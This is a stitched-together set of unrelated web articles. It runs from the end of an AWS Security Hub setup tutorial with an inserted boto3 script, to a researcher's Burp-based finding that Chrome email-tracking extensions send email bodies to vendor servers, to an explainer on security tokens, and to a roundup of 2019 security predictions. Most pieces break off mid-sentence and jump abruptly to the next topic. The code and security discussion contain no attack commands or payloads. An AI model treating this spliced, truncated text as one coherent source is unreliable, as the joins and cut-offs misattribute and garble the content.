If we look back in Security Hub the Summary screen will now start showing some useful data about our compliance metrics.


We’ll also see that these benchmarks now show up in my Security Hub findings with a status of either FAILED or PASSED. For any failed check, the finding also shows the CIS benchmark title, so you can see which benchmark has been missed.


There are also additional providers that can be added to the Security Hub to make it more extensible. Out of the box there are three more services that AWS will aggregate in your findings list which are:

GuardDuty
Inspector
Macie

You can set those three services up in your AWS account to have their findings aggregated within the Security Hub service console. There are also third-party services that can be added to the console; this is done by going into the “Settings” menu and enabling them from the providers screen. This makes Security Hub a “single pane of glass” for aggregating your compliance and security findings.

Add Additional Accounts

So far we’ve done all the configuration within a single account, but what if we’ve designed our AWS environments with multiple accounts for billing or security reasons? Not a problem, we can go back into the settings of our Security Hub console and we can invite other accounts. To do this go to the Accounts tab and invite another account. When you invite another account nothing will happen until the member accounts accept the invitation.


To accept, we’ll log in to the member account and go into the Security Hub console just as we did with our master account. Then under settings, we’ll see an invitation from the master. Click the Accept slider button to accept the invitation. Once this is complete, the results for the member account will be displayed in the master account’s Security Hub console. Be sure to enable Config, GuardDuty, Inspector, etc. on the member accounts too, so that all your findings are being sent along correctly.
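The same setup sequence scripted against the Security Hub and Config APIs rather than clicked through in the console: enable Config recording, enable Security Hub with the CIS standard, invite member accounts from the master account, accept on the member side, and pull the FAILED findings. This is an added example, not the post's or AWS's own code; the account ids, e-mail address, role ARN and bucket name are constructed placeholders, and the `RecordingClient` is a stand-in for a boto3 client so the workflow can be exercised offline.

```python
"""Security Hub multi-account setup through the API. Added example, not the
post's or AWS's own code. Pass real boto3 clients (boto3.client("config") and
boto3.client("securityhub")) to run it for real; RecordingClient is an offline
stand-in. Account ids, e-mail, role ARN and bucket below are placeholders."""

# CIS AWS Foundations Benchmark standard ARN as used by Security Hub.
CIS_STANDARD_ARN = "arn:aws:securityhub:::ruleset/cis-aws-foundations-benchmark/v/1.2.0"


class RecordingClient:
    """Offline stand-in for a boto3 client: records each call and returns a
    canned response so the workflow can be exercised without AWS access."""

    def __init__(self, responses=None):
        self.calls = []
        self.responses = responses or {}

    def __getattr__(self, api):
        def call(**kwargs):
            self.calls.append((api, kwargs))
            return self.responses.get(api, {})
        return call


def enable_config_recording(config, role_arn, bucket):
    """The CIS checks are AWS Config rules, so a recorder covering regional
    and global resources must exist before the standard is enabled."""
    config.put_configuration_recorder(ConfigurationRecorder={
        "name": "default",
        "roleARN": role_arn,
        "recordingGroup": {"allSupported": True, "includeGlobalResourceTypes": True},
    })
    config.put_delivery_channel(DeliveryChannel={"name": "default", "s3BucketName": bucket})
    config.start_configuration_recorder(ConfigurationRecorderName="default")


def enable_hub_with_cis(hub):
    """Master (administrator) account: turn on Security Hub and subscribe to
    the CIS standard. Returns the subscription ARNs AWS reports back."""
    hub.enable_security_hub(EnableDefaultStandards=False)
    resp = hub.batch_enable_standards(
        StandardsSubscriptionRequests=[{"StandardsArn": CIS_STANDARD_ARN}])
    return [s["StandardsSubscriptionArn"] for s in resp.get("StandardsSubscriptions", [])]


def invite_member_accounts(hub, members):
    """members: list of (account_id, email). Returns the ids AWS could not
    process, which is the list to check before assuming coverage is complete."""
    hub.create_members(AccountDetails=[{"AccountId": a, "Email": e} for a, e in members])
    resp = hub.invite_members(AccountIds=[a for a, _ in members])
    return [u["AccountId"] for u in resp.get("UnprocessedAccounts", [])]


def accept_invitation_from(member_hub, master_account_id):
    """Member account: accept only the invitation from the expected master
    account (the post's 'master' is 'administrator' in the current API)."""
    for inv in member_hub.list_invitations().get("Invitations", []):
        if inv["AccountId"] == master_account_id:
            member_hub.accept_administrator_invitation(
                AdministratorId=master_account_id, InvitationId=inv["InvitationId"])
            return inv["InvitationId"]
    return None


def failed_controls(hub, max_pages=50):
    """(account id, control title) for every FAILED compliance finding across
    all aggregated accounts, following NextToken pagination."""
    filters = {"ComplianceStatus": [{"Value": "FAILED", "Comparison": "EQUALS"}]}
    failed, token = [], None
    for _ in range(max_pages):
        kwargs = {"Filters": filters, "MaxResults": 100}
        if token:
            kwargs["NextToken"] = token
        resp = hub.get_findings(**kwargs)
        failed.extend((f["AwsAccountId"], f["Title"]) for f in resp.get("Findings", []))
        token = resp.get("NextToken")
        if not token:
            break
    return failed


if __name__ == "__main__":
    # Offline run against the recorder; swap in boto3 clients for a real account.
    config, hub = RecordingClient(), RecordingClient()
    enable_config_recording(config, "arn:aws:iam::111111111111:role/ConfigRolePlaceholder",
                            "config-bucket-placeholder")
    print(enable_hub_with_cis(hub))
    print(invite_member_accounts(hub, [("222222222222", "secops@member.example")]))
    print(failed_controls(hub))
    for api, _ in config.calls + hub.calls:
        print("called", api)
```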

Summary

AWS Security Hub is a really nice-to-have service that brings all the individual compliance and security tools AWS offers into a single view for administrators. As of the time of this writing, the Security Hub service pricing is not available yet, but you will be charged for the services it relies on, such as AWS Config and GuardDuty. If you’re setting up a production AWS environment, Security Hub should be part of your basic deployment routine.

Security Check: Can Chrome Email Tracking Extensions Store Your Private Emails?


My name is Vadym, I am from Anti-Malware Lab (former Kromtech Security Center). Our research project focused on monitoring digital risks and privacy violations. Here are our recent research findings. If you have questions, concerns or ideas to update it, please comment here or contact me.

TL;DR

If you were wondering whether you can rely on the privacy of email trackers in Chrome, the short answer is: not really. Two of the three most popular email tracking extensions we analyzed are receiving content from the body of your email even when this is not necessary.

The Long [detailed] Answer

You have to watch your back in extension stores. This is especially true in Chrome with the almost 60 percent market share that makes the browser a nice piece of pie for cybercriminals. Google says that 70 percent of the malicious extensions are blocked, but a steady stream of recent research findings show that the problem is far from resolved.

I want to emphasize that extensions shouldn’t be malicious to be dangerous. The collection of unnecessary (for extension work) user data could potentially lead to problems on par with malware cases.

Based on feedback from some of our users, we decided to analyse three popular free mail trackers ― Yesware, Mailtrack, and Docsify. Each of them allows tracking email open and reply rates, link clicks, attachment opens, and presentation pageviews as well as allowing copies of important emails to be sent directly to your CRM automatically.

We looked at the permissions that each extension requests, the actual data from your email that goes to the extensions’ hosts, and how this is all shown in the Privacy Policy. Here’s a breakdown of what we found.

The Permissions You Give

Installing Yesware is accompanied by the standard permissions it requires. The most nefarious-looking request is to “Read and change all your data on [all] websites you visit.”

Usually, such extensions only require this level of permission on a specific website. For example, the official Google Mail Checker (email tracking for Gmail) asks to “Read and change your data on all google.com sites.”

As far as I can tell, the extension developers decided to ask for “unlimited” permission instead of bothering you with an extended list of websites where their extension is going to interact. However, you need to understand that in accepting this you are giving Yesware much more accessibility than it needs for its actual work.


Interestingly, we noticed that after confirming the permissions for the extension, you then have to confirm other permissions ― for the app.


It’s important to know that permissions that present like the screenshot above are related to the app, not the extension.

What does this mean? Essentially, if you decide to delete the extension, the app will still have access to your data.


Similarly, Docsify asks permission to read and change all your data on the websites you visit. Permissions are required by the application as well.


Mailtrack, in contrast to the first example, doesn’t ask users for access to all websites, only email-related websites.


These permissions are standard for this type of extension ― to read, send, delete, and manage the emails.

The Email Data They Get

The most interesting part of our investigation came from analyzing the email content which each extension collects and processes. At this stage, we used Burp, a tool for testing web application security. Its proxy server lets us inspect the raw data passing in both directions ― in our case, from sender to extension data storage.

Yesware Email Data Collection

The Yesware Privacy Policy and Terms of Use don’t include information regarding storage of the data from your email. However, our research shows that the app does manage email data storage.

To be clear, we tested the free version of Yesware without CRM integration. After composing and sending an email, we checked the host app.yesware.com in Burp to find the data from the email message that was sent there.


Our sample email with tracking features turned on in Yesware.

It’s easy to notice that our email body went to the Yesware host. In other words, the extension collected and processed the entire content of this personal email.


The data we found with Burp.

Surprisingly and importantly, when we deselected the Track and CRM checkboxes in order to stop tracking any activity related to our emails, the situation remained the same.


The content of the second email with tracking features off.

Yesware sent the body of the email even in this case.


The Burp analysis of the second case.

We determined that only turning off all the features in the extension preferences helped. In that case no data was sent to the host.


In order to get an explanation for all this, we sent an email to Yesware support. The first email, sent to support@yesware.zendesk.com on 12 October 2018, is reproduced below.

Dear Yesware Security Team,

My name is Vadym, I am a security researcher with Kromtech Alliance Corp. (https://kromtech.com/). We are a product developer company, with malware analysis as one of our activities. During recent research our team discovered that the “Yesware Email Tracking” Chrome extension sends an e-mail body to the domain app.yesware.com even if the user turned trac

An Overview of STOs and Private Offerings in the US


John Wu


You own a startup, or an office building in Manhattan, and you’ve heard a lot of buzz about turning your asset into a security token. You likely have many questions, such as “What is a security token?”, “Why should I use a security token?”, and “How do I do that?”. I am going to help answer those questions and explain why issuing a security token is just a faster, more modern, and more valuable extension of a traditional security issuance.

What is a security token?

A “security token” is legally identical to a traditional security. The only difference between a security and a security token is the manner in which ownership is recorded. Simply put, a security token is a security that has been turned into a digital asset on a blockchain. If that sounds foreign to you, take a look at this helpful primer put together by Deloitte that explains the basics of blockchain technology.

To give a quick overview: a blockchain is a permanent ledger of transactions shared across a network of computers (nodes). In order for a transaction to be added to the ledger, it must be verified by other members of the network, after which it is stored in an entry “block” at the end of a sequence “chain” of all previous blocks. Because of the nature of how data is verified and stored on the blockchain, there are a couple characteristics that make it an ideal mechanism for recording and transferring ownership of assets:

It is trustless ― because the ledger is shared between all nodes in the network, there is no single party responsible for honestly entering each entry. Instead, the members must work together to come to a consensus, eliminating the need to place trust in a central authority.
It is transparent and immutable ― records of all transactions are stored on the “chain” of previous blocks. These cannot be changed.

By using blockchain, there is no longer a need for all parties to maintain their own ledgers: instead, they can use the shared record of the blockchain.

I heard a useful analogy for the tokenization of assets from Harbor CEO, Josh Stein. He equates the difference between a security token and a security to the difference between email and snail mail. Before email came along, written correspondence was slow and inefficient. Because of the effort that went into sending a letter, people simply did not send them that frequently. Not only that, but the recipient of a letter had to wait several days before the message got to them.

Email has made communication more efficient and more common. Think of all of the emails you send. For how many of them would you have taken the time to write a letter, address an envelope, put the letter in the envelope, lick, seal, stamp, and send? Tokenization offers the promise of both a more efficient securities market, and a larger and more active securities market. Much like the evolution from snail mail to email caused written communication to be more efficient and more common, tokenizing securities will make trading more frequent and more efficient, and will make more asset classes accessible to investors.

Why should issuers use a security token?

There are many advantages that issuing a security token has over a traditional security. The primary benefits can be broken down into transparency, automated settlement, fractionalization, global availability, and liquidity.

Transparency:

The transparent nature of each transaction means that the blockchain serves as a public record of ownership for your security token. Currently, private issuers are required to maintain a capitalization table recording the ownership of their security, which can be expensive. Companies are also only permitted to have a maximum of 2,000 shareholders before they are required to go public. Because of this, most private companies restrict their shareholders from transferring shares, which harms investors and employees by denying them liquidity. Through tokenization, it is possible to code regulations into the token, allowing issuers to authorize trading without having to worry about running afoul of SEC regulations. Issuing tokens instead of certificates eliminates recordkeeping costs and increases shareholder liquidity.

Automated Settlement:

Settling trades via blockchain reduces transaction costs. In a traditional securities transaction, there are several parties responsible for acting as a trusted intermediary to help settle the trade. For instance, central counterparty clearing acts as a trusted third party in the middle of trades to protect against either party defaulting. It is impossible to default in a security token trade, as the transaction can only be confirmed if both parties have sufficient funds to cover their obligations. Therefore, there is no need for rent-seeking third parties to participate in the trade.

Tokenization also greatly reduces transaction time. Traditional public equity trades settle T+2. This means that a transaction is confirmed 2 business days after it is initiated. So if you purchase shares on Monday, the transaction is not actually completed until Wednesday. Private equity trades can take anywhere from 30 to 90 days to settle. A security token trade is confirmed as soon as the exchange of tokens is confirmed on the blockchain. Nearly all security tokens are issued on the Ethereum network, and block confirmation time on Ethereum averages 10 to 20 seconds, so tokenization reduces settlement time by orders of magnitude.

Fractionalization:

Let’s go back to that office building in Manhattan. Assume it’s worth $100MM. Trying to sell a hundred-million dollar asset is always going to be difficult, and ultimately results in you selling the asset for less than full value. There are a couple of reasons behind this discount: first, because the number of buyers willing to purchase such a large asset is limited, and second, because buyers understand the illiquid nature of the asset, and are not willing to pay as much for an asset that is difficult to resell. Now imagine you can split up your office building into a million freely tradable shares. Through tokenization, nearly all investors can afford to own a piece of New York real estate, increasing demand, and because the shares are liquid, investors are willing to pay more for each fraction of the real estate. You have just sold the building for more than you would have otherwise, simply because the ownership was tokenized.

Global Availability:

Tokenizing your security not only opens up investment opportunities to smaller investors within the US, it also provides easier access to investors of all levels throughout the world. Buying foreign securities in the traditional manner is a complex process. If the securities are even available, they are often offered with layers of costs and obscurity wrapped around them. Through tokenization, your offering can be easily purchased by an investor in China or Belgium, increasing global demand and liquidity.

All of these benefits result in security tokens being more valuable than their traditional counterparts. As I mentioned when looking at the tokenization of the building in Manhattan, increased liquidity often results in an increase in value, because investors are willing to pay more for assets they know can be traded ea

The beginning of the end for the password, more regulation and more IoT risks -- ...


When we looked at security predictions at this time last year, some experts were predicting that we'd see attacks on cryptocurrencies and that we'd continue to see a rise in the scale and profile of attacks.

They've been proved right on both counts over the course of 2018, so what is next year going to have in store? We've canvassed the views of a number of industry figures to find out what they see as the key security issues for 2019.

The end of the password

The end of the password as a prime security measure is something people have talked about for a long time. But are we now reaching a tipping point? After a number of high-profile breaches, people are finally going to be fed up, thinks Adam Kujawa of Malwarebytes Labs: "I'm really hoping that we’ll start to see a bigger adoption by large organizations of multi-factor authentication, to make it so that whatever information is stolen it won’t really matter as it will be impossible to log in. Will we see the end of passwords in 2019? No, it's going to take years to roll out across the board, but I am excited to see what companies start doing to address the problem."

The fact that relying on passwords alone is inadvisable is echoed by Jarrod Overson, director of engineering at Shape Security: "Breach disclosures due to credential stuffing attacks have seen a sharp ramp up in 2018 with Macy's, Uber, Dunkin Donuts and HSBC all falling victim. I imagine this is going to be a trend that continues to increase in 2019 because of regulatory requirements, heightened sensitivity, and increasing attacker sophistication."

Ira Shamkova, SVP of product management at Intermedia, expects biometric security to gain in importance: "With more and more personal and business information being stored in the cloud, internet speeds increasing and the ease of access to information always improving, devices are becoming of secondary importance. In the coming years, expect to see employees have the ability to sign onto any computer or communications device with a retinal or other biometric scan to easily access their virtual desktop, load any tools (including collaboration tools), and quickly pull all of their documents. The device will simply be a window to access information, not its home."

But biometrics may not be infallible. Forcepoint's global CTO, Nico Fischbach, believes that, "Hackers will steal the public's faces in 2019 [because] facial recognition has serious vulnerabilities."

Increased regulation

2018 saw the introduction of GDPR in Europe, and the trend towards more regulation is expected to continue. "The enforcement ramifications as a result of General Data Protection Regulation (GDPR) compliance are yet to be seen," says Rod Oancea, director, governance and compliance services at InterVision. "Many businesses are still attempting to cope with how to meet the regulation's extensive reach and requirements. Expect some fairly large penalties and fines in 2019 to show up in national and international news headlines from GDPR; and while US regulation around privacy has lagged behind historically, high-profile incidents and the resulting public interest have brought the stigma of data breaches to the (very costly) forefront. In turn, anticipate increased focus on what could have been done to prevent breaches, scrutiny on the effectiveness of data protection and security, and a higher bar for compliance with an ever-evolving number of requirements. As the outright and pervasive costs of non-compliance and breaches continue to grow, many organizations will need to invest in their security and data privacy practices, especially proactively in solution design."

But the push to privacy and data protection may come at a price for innovation, according to Chris Byers, CEO of Formstack: "Countries that continue to push data protection and privacy will lag behind countries with less structure and requirement. As countries continue to press forward with making privacy a high value they may not realize that they are giving up ground in innovation. Innovation thrives in countries that support it through legislation and laws that support a free economy with low barriers to entry. The deeper the investment in privacy and protection, the less we will see innovation thrive."

IoT risks

The rise in the number of IoT devices presents risk too. Raj Samani, chief scientist and fellow at McAfee, says, "When you bring connected devices into the home, you need to make sure you enjoy using them in a safe and risk-free way. While these threats can seem scary, people can do a number of things to easily protect their smartphones, and therefore their smart homes, from malware. There's mobile security that warns you about risky apps before you download or use them, and it often comes down to simple things such as being savvy with your passwords. If you have the right security in place, there's no reason to be scared of smartphones or smart homes."

"Hackers are exploiting the woefully inadequate security on smart home devices to build powerful botnets, capable of delivering devastating DDoS attacks. Again, this is something we're only likely to see more of. As use of the Internet continues to balloon at an exponential rate, we will see both the number of attacks and the fallout caused by them grow in severity," says Sean McGrath, privacy expert and cybersecurity advocate at BestVPN.com.

Panda Labs echoes this view in its annual report: "In 2019 we are likely to see an increase in attacks not just on routers, but on IoT devices in general. There are two main reasons for this: on the one hand, these devices' default security leaves much to be desired, with default passwords or simply no passwords at all. On the other hand, these devices are more difficult to update, and many users don't even know how to do so."

The Wi-Fi that connects these devices is expected to come under threat too. "While WPA3 has undergone significant improvements over WPA2, it still does not provide protection from threat categories that operate primarily at Layer 2 and include: rogue APs, rogue clients, evil twin APs, neighbour APs, ad-hoc networks and misconfigured APs," says Corey Nachreiner, CTO at WatchGuard Technologies. "We think it is highly likely that we'll see at least one of these threat categories used to compromise a WPA3 network, and our money is on the Evil Twin AP."

ESET's Senior Security Researcher Stephen Cobb says, "I predict that criminals will continue to expand their abuse of remote access functionality, often via Remote Desktop Protocol (RDP). When RDP is poorly installed on systems that can be reached directly via the internet, it can be attacked to gain unauthorized access. At that point, criminals can employ native operating system tools to stealthily abuse these compromised machines -- a technique known as 'living off the land' -- for a variety of malicious purposes, based on their configuration and connectivity."

Addressing the skills shortage Jason Haddix, VP o